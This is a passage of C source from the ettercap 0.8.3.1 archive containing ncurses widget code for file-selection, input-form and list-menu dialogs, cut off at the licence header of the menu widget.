/* * delete the internal menu for the files */ static void wdg_file_menu_destroy(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_file_handle, ww); int i = 0; /* nothing to free */ if (ww->nitems == 0) return; unpost_menu(ww->m); free_menu(ww->m); /* free all the items */ while(ww->items[i] != NULL) free_item(ww->items[i++]); for (i = 0; i < ww->nlist; i++) WDG_SAFE_FREE(ww->namelist[i]); /* free the array */ WDG_SAFE_FREE(ww->items); WDG_SAFE_FREE(ww->namelist); /* reset the counter */ ww->nitems = 0; } /* * create the internal menu for the files */ static void wdg_file_menu_create(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_file_handle, ww); int mrows, mcols; int i; size_t c = wdg_get_ncols(wo); size_t x = wdg_get_begin_x(wo); size_t y = wdg_get_begin_y(wo); struct stat buf; /* the menu is already posted */ if (ww->nitems) return; WDG_DEBUG_MSG("wdg_file_menu_create"); /* get the working directory */ getcwd(ww->curpath, PATH_MAX); /* scan the directory */ ww->nlist = scandir(".", &ww->namelist, 0, alphasort); /* on error display the message in the box */ if (ww->nlist <= 0) { ww->nitems = 2; WDG_SAFE_REALLOC(ww->items, ww->nitems * sizeof(ITEM *)); ww->items[ww->nitems - 2] = new_item("/", "root"); ww->items[ww->nitems - 1] = new_item("Cannot open the directory", ""); item_opts_off(ww->items[ww->nitems - 1], O_SELECTABLE); } else { /* for each directory in the directory */ for (i = 0; i < ww->nlist; i++) { /* * transform the current dir into the root. * useful to exit from a path whose parent is not readable */ if (*ww->namelist[i]->d_name == '.') { *ww->namelist[i]->d_name = '/'; ww->nitems++; WDG_SAFE_REALLOC(ww->items, ww->nitems * sizeof(ITEM *)); ww->items[ww->nitems - 1] = new_item(ww->namelist[i]->d_name, "root"); continue; } /* get the file properties */ stat(ww->namelist[i]->d_name, &buf); if (S_ISDIR(buf.st_mode)) { ww->nitems++; WDG_SAFE_REALLOC(ww->items, ww->nitems * sizeof(ITEM *)); ww->items[ww->nitems - 1] = new_item(ww->namelist[i]->d_name, "[...]"); } // if not readable //item_opts_off(ww->items[ww->nitems - 1], O_SELECTABLE); } /* and now add the files */ for (i = 0; i < ww->nlist; i++) { /* get the file properties */ stat(ww->namelist[i]->d_name, &buf); if (!S_ISDIR(buf.st_mode)) { ww->nitems++; WDG_SAFE_REALLOC(ww->items, ww->nitems * sizeof(ITEM *)); ww->items[ww->nitems - 1] = new_item(ww->namelist[i]->d_name, ""); } } } /* null terminate the array */ WDG_SAFE_REALLOC(ww->items, (ww->nitems + 1) * sizeof(ITEM *)); ww->items[ww->nitems] = NULL; /* create the menu */ ww->m = new_menu(ww->items); /* set the dimensions */ set_menu_format(ww->m, ww->y - 2, 1); set_menu_spacing(ww->m, 2, 0, 0); /* get the geometry to make a window */ scale_menu(ww->m, &mrows, &mcols); /* * if the menu is larger than the main window * adapt to the new dimensions */ if (mcols > (int)c - 4) { ww->x = mcols + 4; wdg_file_redraw(wo); return; } /* create the window for the menu */ ww->mwin = newwin(mrows, MAX(mcols, (int)c - 4), y + 1, x + 2); /* set the color */ wbkgd(ww->mwin, COLOR_PAIR(wo->window_color)); keypad(ww->mwin, TRUE); /* associate with the menu */ set_menu_win(ww->m, ww->mwin); /* the subwin for the menu */ set_menu_sub(ww->m, derwin(ww->mwin, mrows + 1, mcols, 1, 1)); /* menu attributes */ set_menu_mark(ww->m, ""); set_menu_grey(ww->m, COLOR_PAIR(wo->window_color)); set_menu_back(ww->m, COLOR_PAIR(wo->window_color)); set_menu_fore(ww->m, COLOR_PAIR(wo->window_color) | A_REVERSE | A_BOLD); /* display the menu */ post_menu(ww->m); wnoutrefresh(ww->mwin); } /* * destroy the dialog and * call the function associated to the file open dialog */ static void wdg_file_callback(struct wdg_object *wo, const char *path, char *file) { WDG_WO_EXT(struct wdg_file_handle, ww); void (*callback)(const char *, char *); char *p, *f; WDG_DEBUG_MSG("wdg_file_callback"); /* save the values before destroying the object */ callback = ww->callback; WDG_SAFE_STRDUP(p, path); WDG_SAFE_STRDUP(f, file); /* destroy the object */ wdg_destroy_object(&wo); wdg_redraw_all(); /* call the callback */ WDG_EXECUTE(callback, p, f); /* free saved data */ WDG_SAFE_FREE(f); WDG_SAFE_FREE(p); } /* * the user should use it to associate a callback to the file selection */ void wdg_file_set_callback(wdg_t *wo, void (*callback)(const char *path, char *file)) { WDG_WO_EXT(struct wdg_file_handle, ww); ww->callback = callback; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg_input.c000664 000000 000000 00000037743 13711276346 023530 0ustar00rootroot000000 000000 /* WDG -- user input widget Copyright (C) ALoR This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* GLOBALS */ struct wdg_input_handle { WINDOW *win; FORM *form; WINDOW *fwin; FIELD **fields; size_t nfields; size_t x, y; char **buffers; void (*callback)(void); }; /* PROTOS */ void wdg_create_input(struct wdg_object *wo); static int wdg_input_destroy(struct wdg_object *wo); static int wdg_input_resize(struct wdg_object *wo); static int wdg_input_redraw(struct wdg_object *wo); static int wdg_input_get_focus(struct wdg_object *wo); static int wdg_input_lost_focus(struct wdg_object *wo); static int wdg_input_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static void wdg_input_borders(struct wdg_object *wo); static int wdg_input_virtualize(struct wdg_object *wo, int key); static int wdg_input_driver(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static void wdg_input_form_destroy(struct wdg_object *wo); static void wdg_input_form_create(struct wdg_object *wo); static void wdg_input_consolidate(struct wdg_object *wo); /*******************************************/ /* * called to create the menu */ void wdg_create_input(struct wdg_object *wo) { WDG_DEBUG_MSG("wdg_create_input"); /* set the callbacks */ wo->destroy = wdg_input_destroy; wo->resize = wdg_input_resize; wo->redraw = wdg_input_redraw; wo->get_focus = wdg_input_get_focus; wo->lost_focus = wdg_input_lost_focus; wo->get_msg = wdg_input_get_msg; WDG_SAFE_CALLOC(wo->extend, 1, sizeof(struct wdg_input_handle)); } /* * called to destroy the menu */ static int wdg_input_destroy(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_input_handle, ww); size_t i = 0; WDG_DEBUG_MSG("wdg_input_destroy"); /* erase the window */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); werase(ww->win); wnoutrefresh(ww->win); /* destroy the internal form */ wdg_input_form_destroy(wo); /* dealloc the structures */ delwin(ww->win); /* free all the items */ while(ww->fields[i] != NULL) free_field(ww->fields[i++]); /* free the array */ WDG_SAFE_FREE(ww->fields); /* free the buffer array */ WDG_SAFE_FREE(ww->buffers); WDG_SAFE_FREE(wo->extend); return WDG_E_SUCCESS; } /* * called to resize the menu */ static int wdg_input_resize(struct wdg_object *wo) { wdg_input_redraw(wo); return WDG_E_SUCCESS; } /* * called to redraw the menu */ static int wdg_input_redraw(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_input_handle, ww); size_t c, l, x, y; WDG_DEBUG_MSG("wdg_input_redraw"); /* center the window on the screen */ wo->x1 = (current_screen.cols - (ww->x + 2)) / 2; wo->y1 = (current_screen.lines - (ww->y + 2)) / 2; wo->x2 = -wo->x1; wo->y2 = -wo->y1; c = wdg_get_ncols(wo); l = wdg_get_nlines(wo); x = wdg_get_begin_x(wo); y = wdg_get_begin_y(wo); /* deal with rouding */ if (l != ww->y + 2) l = ww->y + 2; if (c != ww->x + 2) c = ww->x + 2; /* the window already exist */ if (ww->win) { /* erase the border */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); werase(ww->win); /* destroy the internal form */ wdg_input_form_destroy(wo); touchwin(ww->win); wnoutrefresh(ww->win); /* set the form color */ wbkgd(ww->win, COLOR_PAIR(wo->window_color)); /* resize the window */ mvwin(ww->win, y, x); wresize(ww->win, l, c); /* redraw the window */ wdg_input_borders(wo); /* create the internal form */ wdg_input_form_create(wo); touchwin(ww->win); /* the first time we have to allocate the window */ } else { /* create the menu window (fixed dimensions) */ if ((ww->win = newwin(l, c, y, x)) == NULL) return -WDG_E_FATAL; /* set the window color */ wbkgd(ww->win, COLOR_PAIR(wo->window_color)); redrawwin(ww->win); /* draw the titles */ wdg_input_borders(wo); /* create the internal form */ wdg_input_form_create(wo); /* no scrolling for menu */ scrollok(ww->win, FALSE); } /* refresh the window */ touchwin(ww->win); wnoutrefresh(ww->win); touchwin(ww->fwin); wnoutrefresh(ww->fwin); wo->flags |= WDG_OBJ_VISIBLE; return WDG_E_SUCCESS; } /* * called when the menu gets the focus */ static int wdg_input_get_focus(struct wdg_object *wo) { /* set the flag */ wo->flags |= WDG_OBJ_FOCUSED; /* redraw the window */ wdg_input_redraw(wo); return WDG_E_SUCCESS; } /* * called when the menu looses the focus */ static int wdg_input_lost_focus(struct wdg_object *wo) { /* set the flag */ wo->flags &= ~WDG_OBJ_FOCUSED; /* redraw the window */ wdg_input_redraw(wo); return WDG_E_SUCCESS; } /* * called by the messages dispatcher when the menu is focused */ static int wdg_input_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_input_handle, ww); WDG_DEBUG_MSG("keypress get msg: %d", key); /* handle the message */ switch (key) { case KEY_MOUSE: /* is the mouse event within our edges ? */ if (wenclose(ww->win, mouse->y, mouse->x)) { wdg_set_focus(wo); /* redraw the menu */ wdg_input_redraw(wo); } else { return -WDG_E_NOTHANDLED; } break; case KEY_ESC: case CTRL('Q'): wdg_destroy_object(&wo); wdg_redraw_all(); return WDG_EFINISHED; break; /* message not handled */ default: if (wo->flags & WDG_OBJ_FOCUSED) { return wdg_input_driver(wo, key, mouse); } else { return -WDG_E_NOTHANDLED; } break; } return WDG_E_SUCCESS; } /* * draw the menu titles */ static void wdg_input_borders(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_input_handle, ww); size_t c = wdg_get_ncols(wo); /* the object was focused */ if (wo->flags & WDG_OBJ_FOCUSED) { wattron(ww->win, A_BOLD); wbkgdset(ww->win, COLOR_PAIR(wo->focus_color)); } else wbkgdset(ww->win, COLOR_PAIR(wo->border_color)); /* draw the borders */ box(ww->win, 0, 0); /* set the title color */ wbkgdset(ww->win, COLOR_PAIR(wo->title_color)); /* there is a title: print it */ if (wo->title) { switch (wo->align) { case WDG_ALIGN_LEFT: wmove(ww->win, 0, 3); break; case WDG_ALIGN_CENTER: wmove(ww->win, 0, (c - strlen(wo->title)) / 2); break; case WDG_ALIGN_RIGHT: wmove(ww->win, 0, c - strlen(wo->title) - 3); break; } wprintw(ww->win, wo->title); } /* restore the attribute */ if (wo->flags & WDG_OBJ_FOCUSED) wattroff(ww->win, A_BOLD); } /* * stransform keys into menu commands */ static int wdg_input_virtualize(struct wdg_object *wo, int key) { WDG_WO_EXT(struct wdg_input_handle, ww); int c; switch (key) { case KEY_RETURN: case KEY_EXIT: c = MAX_FORM_COMMAND + 1; break; case KEY_UP: case KEY_LEFT: c = REQ_PREV_FIELD; /* we are moving... unfocus the current field */ set_field_back(current_field(ww->form), A_UNDERLINE); break; case KEY_DOWN: case KEY_RIGHT: c = REQ_NEXT_FIELD; /* we are moving... unfocus the current field */ set_field_back(current_field(ww->form), A_UNDERLINE); break; case KEY_BACKSPACE: case '\b': case 127: /* how many code does it have ?? argh !! */ c = REQ_DEL_PREV; break; case KEY_DC: c = REQ_DEL_CHAR; break; case KEY_HOME: c = REQ_BEG_FIELD; break; case KEY_END: c = REQ_END_FIELD; break; default: c = key; break; } /* * Force the field that the user is typing into to be in reverse video, * while the other fields are shown underlined. */ //if (c <= KEY_MAX) // set_field_back(current_field(ww->form), A_REVERSE); //else if (c <= MAX_FORM_COMMAND) // set_field_back(current_field(ww->form), A_UNDERLINE); return c; } /* * sends command to the form */ static int wdg_input_driver(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_input_handle, ww); int c, v; /* variable currently not used */ (void) mouse; WDG_DEBUG_MSG("keypress driver: %d", key); /* virtualize the command */ c = form_driver(ww->form, (v = wdg_input_virtualize(wo, key)) ); set_field_back(current_field(ww->form), A_REVERSE); /* one item has been selected */ if (c == E_UNKNOWN_COMMAND) { /* send a command to the form in order to validate the current field */ form_driver(ww->form, REQ_NEXT_FIELD); /* * put the temp buffer in the real one * call the callback * and destroy the object */ wdg_input_consolidate(wo); return WDG_EFINISHED; } wnoutrefresh(ww->fwin); return WDG_E_SUCCESS; } /* * delete the internal form */ static void wdg_input_form_destroy(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_input_handle, ww); /* delete the form */ unpost_form(ww->form); free_form(ww->form); ww->form = NULL; delwin(ww->fwin); } /* * create the internal form */ static void wdg_input_form_create(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_input_handle, ww); int mrows, mcols; size_t c = wdg_get_ncols(wo); size_t x = wdg_get_begin_x(wo); size_t y = wdg_get_begin_y(wo); /* the form is already posted */ if (ww->form) return; /* create the form */ ww->form = new_form(ww->fields); /* get the geometry to make a window */ scale_form(ww->form, &mrows, &mcols); /* create the window for the form */ ww->fwin = newwin(mrows, MAX(mcols, (int)c - 4), y + 1, x + 2); /* set the color */ wbkgd(ww->fwin, COLOR_PAIR(wo->window_color)); keypad(ww->fwin, TRUE); /* associate with the form */ set_form_win(ww->form, ww->fwin); /* the subwin for the form */ set_form_sub(ww->form, derwin(ww->fwin, mrows + 1, mcols, 1, 1)); /* make the active field in reverse mode */ set_field_back(current_field(ww->form), A_REVERSE); /* display the form */ post_form(ww->form); wnoutrefresh(ww->fwin); } /* * set the size of the dialog */ void wdg_input_size(wdg_t *wo, size_t x, size_t y) { WDG_WO_EXT(struct wdg_input_handle, ww); /* add 2 for the space between the label and the field * add 2 for the borders */ ww->x = x + 2 + 4; ww->y = y; /* center the window on the screen */ wo->x1 = (current_screen.cols - (x + 2)) / 2; wo->y1 = (current_screen.lines - (y + 2)) / 2; wo->x2 = -wo->x1; wo->y2 = -wo->y1; } /* * add a field to the form */ void wdg_input_add(wdg_t *wo, size_t x, size_t y, const char *caption, char *buf, size_t len, size_t lines) { WDG_WO_EXT(struct wdg_input_handle, ww); ww->nfields += 2; WDG_SAFE_REALLOC(ww->fields, ww->nfields * sizeof(FIELD *)); /* remember the pointer to the real buffer (to be used in consolidate) */ WDG_SAFE_REALLOC(ww->buffers, (ww->nfields/2 + 1) * sizeof(char *)); ww->buffers[ww->nfields/2 - 1] = buf; ww->buffers[ww->nfields/2] = NULL; /* create the caption */ ww->fields[ww->nfields - 2] = new_field(1, strlen(caption), y, x, 0, 0); set_field_buffer(ww->fields[ww->nfields - 2], 0, caption); field_opts_off(ww->fields[ww->nfields - 2], O_ACTIVE); set_field_fore(ww->fields[ww->nfields - 2], COLOR_PAIR(wo->focus_color)); /* and the modifiable field */ ww->fields[ww->nfields - 1] = new_field(lines, len, y, x + strlen(caption) + 2, 0, 0); set_field_back(ww->fields[ww->nfields - 1], A_UNDERLINE); field_opts_off(ww->fields[ww->nfields - 1], O_WRAP); set_field_buffer(ww->fields[ww->nfields - 1], 0, buf); set_field_fore(ww->fields[ww->nfields - 1], COLOR_PAIR(wo->window_color)); /* null terminate the array */ WDG_SAFE_REALLOC(ww->fields, (ww->nfields + 1) * sizeof(FIELD *)); ww->fields[ww->nfields] = NULL; } /* * copy the temp buffers to the real ones */ static void wdg_input_consolidate(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_input_handle, ww); char *buf; int i = 0, j; size_t buflen; void (*callback)(void); WDG_DEBUG_MSG("wdg_input_consolidate"); while(ww->fields[i] != NULL) { /* get the buffer */ buf = field_buffer(ww->fields[i+1], 0); buflen = strlen(buf); /* trim out the trailing spaces */ for (j = buflen - 1; j >= 0; j--) if (buf[j] == ' ') buf[j] = 0; else break; /* copy the buffer in the real one */ strcpy(ww->buffers[i/2], buf); /* skip the label */ i += 2; } /* execute the callback */ callback = ww->callback; wdg_destroy_object(&wo); wdg_redraw_all(); WDG_EXECUTE(callback); } /* * set the user callback */ void wdg_input_set_callback(wdg_t *wo, void (*callback)(void)) { WDG_WO_EXT(struct wdg_input_handle, ww); ww->callback = callback; } /* * this function will get the input from the user. * CAUTION: this is an hack, since it uses wgetch() * it will takeover the main dispatching loop !!! */ void wdg_input_get_input(wdg_t *wo) { int key, ret; struct wdg_mouse_event mouse; WDG_DEBUG_MSG("wdg_input_get_input"); /* dispatch keys to self */ WDG_LOOP { key = wgetch(stdscr); switch (key) { /* don't switch focus... */ case KEY_TAB: break; case KEY_CTRL_L: /* redrawing the screen is equivalent to resizing it */ case KEY_RESIZE: /* the screen has been resized */ wdg_redraw_all(); /* update the screen */ doupdate(); break; case ERR: /* non-blocking input reached the timeout */ /* sleep for milliseconds */ napms(WDG_INPUT_TIMEOUT * 10); refresh(); doupdate(); break; default: #ifdef NCURSES_MOUSE_VERSION /* handle mouse events */ if (key == KEY_MOUSE) { MEVENT event; getmouse(&event); mouse_trafo(&event.y, &event.x, TRUE); mouse.x = event.x; mouse.y = event.y; mouse.event = event.bstate; } #else /* we don't support mouse events */ memset(&mouse, 0, sizeof(mouse)); #endif /* dispatch the user input */ ret = wdg_input_get_msg(wo, key, &mouse); /* update the screen */ doupdate(); /* * if the object is destroyed or the input finished, * then return to the main loop */ if (ret == WDG_EFINISHED) { WDG_DEBUG_MSG("wdg_input_get_input: return to main loop"); return; } break; } } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg_list.c000664 000000 000000 00000032321 13711276346 023327 0ustar00rootroot000000 000000 /* WDG -- list widget Copyright (C) ALoR This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include /* GLOBALS */ struct wdg_list_call { int key; void (*callback)(void *); SLIST_ENTRY(wdg_list_call) next; }; struct wdg_list_handle { MENU *menu; WINDOW *mwin; WINDOW *win; ITEM *current; ITEM **items; size_t nitems; void (*select_callback)(void *); SLIST_HEAD(, wdg_list_call) callbacks; }; /* PROTOS */ void wdg_create_list(struct wdg_object *wo); static int wdg_list_destroy(struct wdg_object *wo); static int wdg_list_resize(struct wdg_object *wo); static int wdg_list_redraw(struct wdg_object *wo); static int wdg_list_get_focus(struct wdg_object *wo); static int wdg_list_lost_focus(struct wdg_object *wo); static int wdg_list_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static void wdg_list_borders(struct wdg_object *wo); static int wdg_list_virtualize(int key); static int wdg_list_driver(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static void wdg_list_menu_create(struct wdg_object *wo); static void wdg_list_menu_destroy(struct wdg_object *wo); static int wdg_list_callback(struct wdg_object *wo, int key); /*******************************************/ /* * called to create the menu */ void wdg_create_list(struct wdg_object *wo) { WDG_DEBUG_MSG("wdg_create_list"); /* set the callbacks */ wo->destroy = wdg_list_destroy; wo->resize = wdg_list_resize; wo->redraw = wdg_list_redraw; wo->get_focus = wdg_list_get_focus; wo->lost_focus = wdg_list_lost_focus; wo->get_msg = wdg_list_get_msg; WDG_SAFE_CALLOC(wo->extend, 1, sizeof(struct wdg_list_handle)); } /* * called to destroy the menu */ static int wdg_list_destroy(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_list_handle, ww); struct wdg_list_call *c; int i = 0; WDG_DEBUG_MSG("wdg_list_destroy"); /* erase the window */ wdg_list_menu_destroy(wo); wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); werase(ww->win); wnoutrefresh(ww->win); /* dealloc the structures */ delwin(ww->win); /* all the items */ while (ww->items && ww->items[i] != NULL) free_item(ww->items[i++]); WDG_SAFE_FREE(ww->items); /* free the callback list */ while (SLIST_FIRST(&ww->callbacks) != NULL) { c = SLIST_FIRST(&ww->callbacks); SLIST_REMOVE_HEAD(&ww->callbacks, next); WDG_SAFE_FREE(c); } WDG_SAFE_FREE(wo->extend); return WDG_E_SUCCESS; } /* * called to resize the menu */ static int wdg_list_resize(struct wdg_object *wo) { wdg_list_redraw(wo); return WDG_E_SUCCESS; } /* * called to redraw the menu */ static int wdg_list_redraw(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_list_handle, ww); size_t c = wdg_get_ncols(wo); size_t l = wdg_get_nlines(wo); size_t x = wdg_get_begin_x(wo); size_t y = wdg_get_begin_y(wo); WDG_DEBUG_MSG("wdg_list_redraw"); /* the window already exist */ if (ww->win) { /* erase the border */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); werase(ww->win); touchwin(ww->win); wnoutrefresh(ww->win); /* delete the internal menu */ wdg_list_menu_destroy(wo); /* resize the window and draw the new border */ mvwin(ww->win, y, x); wresize(ww->win, l, c); wdg_list_borders(wo); /* redraw the menu */ wdg_list_menu_create(wo); /* the first time we have to allocate the window */ } else { /* create the menu window (fixed dimensions) */ if ((ww->win = newwin(l, c, y, x)) == NULL) return -WDG_E_FATAL; /* draw the titles */ wdg_list_borders(wo); /* draw the menu */ wdg_list_menu_create(wo); /* no scrolling for menu */ scrollok(ww->win, FALSE); } /* refresh the window */ touchwin(ww->win); wnoutrefresh(ww->win); touchwin(ww->mwin); wnoutrefresh(ww->mwin); wo->flags |= WDG_OBJ_VISIBLE; return WDG_E_SUCCESS; } /* * called when the menu gets the focus */ static int wdg_list_get_focus(struct wdg_object *wo) { /* set the flag */ wo->flags |= WDG_OBJ_FOCUSED; /* redraw the window */ wdg_list_redraw(wo); return WDG_E_SUCCESS; } /* * called when the menu looses the focus */ static int wdg_list_lost_focus(struct wdg_object *wo) { /* set the flag */ wo->flags &= ~WDG_OBJ_FOCUSED; /* redraw the window */ wdg_list_redraw(wo); return WDG_E_SUCCESS; } /* * called by the messages dispatcher when the menu is focused */ static int wdg_list_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_list_handle, ww); /* handle the message */ switch (key) { case KEY_MOUSE: /* is the mouse event within our edges ? */ if (wenclose(ww->win, mouse->y, mouse->x)) { wdg_set_focus(wo); /* pass the event to the menu */ wdg_list_driver(wo, key, mouse); } else return -WDG_E_NOTHANDLED; break; case KEY_DOWN: case KEY_UP: case KEY_NPAGE: case KEY_PPAGE: /* move only if focused */ if (wo->flags & WDG_OBJ_FOCUSED) { /* pass the event to the menu */ wdg_list_driver(wo, key, mouse); } else return -WDG_E_NOTHANDLED; break; case KEY_RETURN: if (item_userptr(current_item(ww->menu))) WDG_EXECUTE(ww->select_callback, item_userptr(current_item(ww->menu))); break; /* message not handled */ default: return wdg_list_callback(wo, key); break; } return WDG_E_SUCCESS; } /* * draw the list borders */ static void wdg_list_borders(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_list_handle, ww); size_t c = wdg_get_ncols(wo); /* the object was focused */ if (wo->flags & WDG_OBJ_FOCUSED) { wattron(ww->win, A_BOLD); wbkgdset(ww->win, COLOR_PAIR(wo->focus_color)); } else wbkgdset(ww->win, COLOR_PAIR(wo->border_color)); /* draw the borders */ box(ww->win, 0, 0); /* set the title color */ wbkgdset(ww->win, COLOR_PAIR(wo->title_color)); /* there is a title: print it */ if (wo->title) { switch (wo->align) { case WDG_ALIGN_LEFT: wmove(ww->win, 0, 3); break; case WDG_ALIGN_CENTER: wmove(ww->win, 0, (c - strlen(wo->title)) / 2); break; case WDG_ALIGN_RIGHT: wmove(ww->win, 0, c - strlen(wo->title) - 3); break; } wprintw(ww->win, wo->title); } /* restore the attribute */ if (wo->flags & WDG_OBJ_FOCUSED) wattroff(ww->win, A_BOLD); } /* * set the elements for the list */ void wdg_list_set_elements(struct wdg_object *wo, struct wdg_list *list) { WDG_WO_EXT(struct wdg_list_handle, ww); size_t i = 0; wdg_list_menu_destroy(wo); /* forget the curren position, we are creating a new menu */ ww->current = NULL; /* free any previously alloc'd item */ while (ww->items && ww->items[i] != NULL) free_item(ww->items[i++]); WDG_SAFE_FREE(ww->items); i = 0; ww->nitems = 0; /* walk thru the list and set the menu items */ while (list[i].desc != NULL) { /* count the items added */ ww->nitems++; WDG_SAFE_REALLOC(ww->items, ww->nitems * sizeof(ITEM *)); ww->items[i] = new_item(list[i].desc, ""); set_item_userptr(ww->items[i], list[i].value); i++; } /* add the null termination to the array */ WDG_SAFE_REALLOC(ww->items, (ww->nitems + 1) * sizeof(ITEM *)); ww->items[ww->nitems] = NULL; wdg_list_menu_create(wo); } /* * stransform keys into menu commands */ static int wdg_list_virtualize(int key) { switch (key) { case KEY_NPAGE: return (REQ_SCR_DPAGE); case KEY_PPAGE: return (REQ_SCR_UPAGE); case KEY_DOWN: return (REQ_NEXT_ITEM); case KEY_UP: return (REQ_PREV_ITEM); default: if (key != KEY_MOUSE) beep(); return (key); } } /* * sends command to the active menu */ static int wdg_list_driver(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_list_handle, ww); int c; /* variable currently not used */ (void) mouse; c = menu_driver(ww->menu, wdg_list_virtualize(key) ); /* skip non selectable items */ if ( !(item_opts(current_item(ww->menu)) & O_SELECTABLE) ) c = menu_driver(ww->menu, wdg_list_virtualize(key) ); /* one item has been selected */ if (c == E_UNKNOWN_COMMAND) { if (item_userptr(current_item(ww->menu))) WDG_EXECUTE(ww->select_callback, item_userptr(current_item(ww->menu))); } /* tring to go outside edges */ if (c == E_REQUEST_DENIED) return -WDG_E_NOTHANDLED; wnoutrefresh(ww->mwin); return WDG_E_SUCCESS; } /* * create the menu */ static void wdg_list_menu_create(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_list_handle, ww); size_t l = wdg_get_nlines(wo); size_t x = wdg_get_begin_x(wo); size_t y = wdg_get_begin_y(wo); int mrows = 0, mcols = 0; /* skip the creation if: * - already displayed * - no items are present */ if (ww->menu || !ww->items || ww->nitems == 0) return; /* create the menu */ ww->menu = new_menu(ww->items); /* set the dimensions */ set_menu_format(ww->menu, l - 4, 1); set_menu_spacing(ww->menu, 2, 0, 0); /* get the geometry to make a window */ scale_menu(ww->menu, &mrows, &mcols); ww->mwin = newwin(mrows + 1, mcols, y + 2, x + 2); /* set the color */ wbkgd(ww->mwin, COLOR_PAIR(wo->window_color)); keypad(ww->mwin, TRUE); /* associate with the menu */ set_menu_win(ww->menu, ww->mwin); /* the subwin for the menu */ set_menu_sub(ww->menu, derwin(ww->mwin, mrows + 1, mcols, 2, 2)); /* menu attributes */ set_menu_mark(ww->menu, ""); set_menu_grey(ww->menu, COLOR_PAIR(wo->window_color)); set_menu_back(ww->menu, COLOR_PAIR(wo->window_color)); set_menu_fore(ww->menu, COLOR_PAIR(wo->window_color) | A_REVERSE | A_BOLD); /* repristinate the current position */ if (ww->current) set_current_item(ww->menu, ww->current); /* display the menu */ post_menu(ww->menu); wnoutrefresh(ww->mwin); } /* * destroy the menu */ static void wdg_list_menu_destroy(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_list_handle, ww); /* nothing to clear */ if (ww->menu == NULL) return; /* remember the current position to be repristinated on menu create */ ww->current = current_item(ww->menu); /* hide the menu */ unpost_menu(ww->menu); /* erase the menu */ wbkgd(ww->mwin, COLOR_PAIR(wo->screen_color)); werase(ww->mwin); wnoutrefresh(ww->mwin); /* delete the memory */ free_menu(ww->menu); ww->menu = NULL; } /* * set the select callback */ void wdg_list_select_callback(wdg_t *wo, void (*callback)(void *)) { WDG_WO_EXT(struct wdg_list_handle, ww); ww->select_callback = callback; } /* * add the user callback(s) */ void wdg_list_add_callback(wdg_t *wo, int key, void (*callback)(void *)) { WDG_WO_EXT(struct wdg_list_handle, ww); struct wdg_list_call *c; WDG_SAFE_CALLOC(c, 1, sizeof(struct wdg_list_call)); c->key = key; c->callback = callback; SLIST_INSERT_HEAD(&ww->callbacks, c, next); } /* * search for a callback and execute it */ static int wdg_list_callback(struct wdg_object *wo, int key) { WDG_WO_EXT(struct wdg_list_handle, ww); struct wdg_list_call *c; SLIST_FOREACH(c, &ww->callbacks, next) { if (c->key == key) { void *value; WDG_DEBUG_MSG("wdg_list_callback"); /* retrieve the value from the current item */ value = item_userptr(current_item(ww->menu)); /* execute the callback */ WDG_EXECUTE(c->callback, value); return WDG_E_SUCCESS; } } return -WDG_E_NOTHANDLED; } /* * force the repaint of the menu */ void wdg_list_refresh(wdg_t *wo) { WDG_WO_EXT(struct wdg_list_handle, ww); WDG_DEBUG_MSG("wdg_list_refresh"); /* remember the position */ ww->current = current_item(ww->menu); /* delete the window */ unpost_menu(ww->menu); /* set the old position */ set_current_item(ww->menu, ww->current); /* draw the menu */ post_menu(ww->menu); wnoutrefresh(ww->mwin); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg_menu.c000664 000000 000000 00000042077 13711276346 023331 0ustar00rootroot000000 000000 /* WDG -- menu widget Copyright (C) ALoR This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public 